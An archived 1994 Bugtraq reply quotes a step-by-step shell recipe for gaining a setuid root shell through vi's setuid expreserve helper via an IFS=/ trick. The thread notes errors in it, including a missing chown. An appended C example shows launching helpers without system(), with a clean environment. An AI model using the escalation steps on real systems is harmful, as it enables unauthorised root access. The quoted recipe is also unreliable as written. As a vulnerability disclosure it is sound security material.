Bugtraq mailing list archives

Re: chmod 000 .rhosts - works?
From: chowes () helix net (Charles Howes)
Date: Mon, 17 Oct 1994 02:46:30 -0700 (PDT)


On Sun, 16 Oct 1994, Chris Ellwood wrote:

> Charles Howes said...
>> ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
>>   versions).  Expreserve is setuid root.  Expreserve runs /bin/mail
>>   with 'system()'.  So, do the following:
>>     % cd /tmp
>>     % cp /bin/sh fubar
>>     % cat > bin
>>     chmod 4755 fubar
>>     ^D
>>     % chmod u+x fubar
>
> I see a couple problems with the script so far.  /bin/sh was copied
> to fubar while you are a regular user, so it will be owned by you
> and you'll end up with a nice copy of /bin/sh that's setuid to you,
> not your target user.  Also, that last line should probably read
> 'chmod u+x bin', not fubar.

Ooops, forgot the chown.  Sigh.  Trust memory to lose things.

>>     % setenv IFS=/
>>     % vi
>>     :pre
>>     :q
>>     % fubar
>>     #
>>   Some versions of expreserve don't have the hole.
>>   Some versions of vi don't have the :pre command.
>>   One does not imply the other.
>
> Thanks for posting it anyway.
>
> - Chris


--
Charles Howes -- chowes () helix net
 Always tell the truth, then you make it the other bloke's problem! 
 - Sean Connery, 1971   
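
An added example, not part of the original post or of any vi/expreserve source: one way a privileged program can launch a helper such as a mailer without system(), so that the caller's IFS and PATH never reach it. The name run_helper and the environment values are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for the child; nothing is inherited from the caller,
 * so a caller-chosen IFS or PATH never reaches the helper. (Assumed values.) */
static char *const clean_env[] = { "PATH=/usr/bin:/bin", "IFS= \t\n", NULL };

/* run_helper (hypothetical name): run an absolute-path program without a
 * shell, with the fixed environment and the real (unprivileged) ids.
 * Returns the child's exit status, or -1 on failure. */
int run_helper(const char *path, char *const argv[])
{
    int status;
    pid_t pid;

    if (path == NULL || path[0] != '/')   /* absolute paths only */
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Drop group first, then user; give up if either call fails. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        execve(path, argv, clean_env);    /* no system(), no shell parsing */
        _exit(127);                       /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Constructed demo: the caller changes IFS and PATH; sh is used here
     * only as a probe to show the child sees clean_env instead. */
    char *const argv[] = { "sh", "-c", "test \"$PATH\" = /usr/bin:/bin", NULL };
    setenv("IFS", "/", 1);
    setenv("PATH", "/tmp", 1);
    printf("child exit status: %d\n", run_helper("/bin/sh", argv));
    return 0;
}
```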


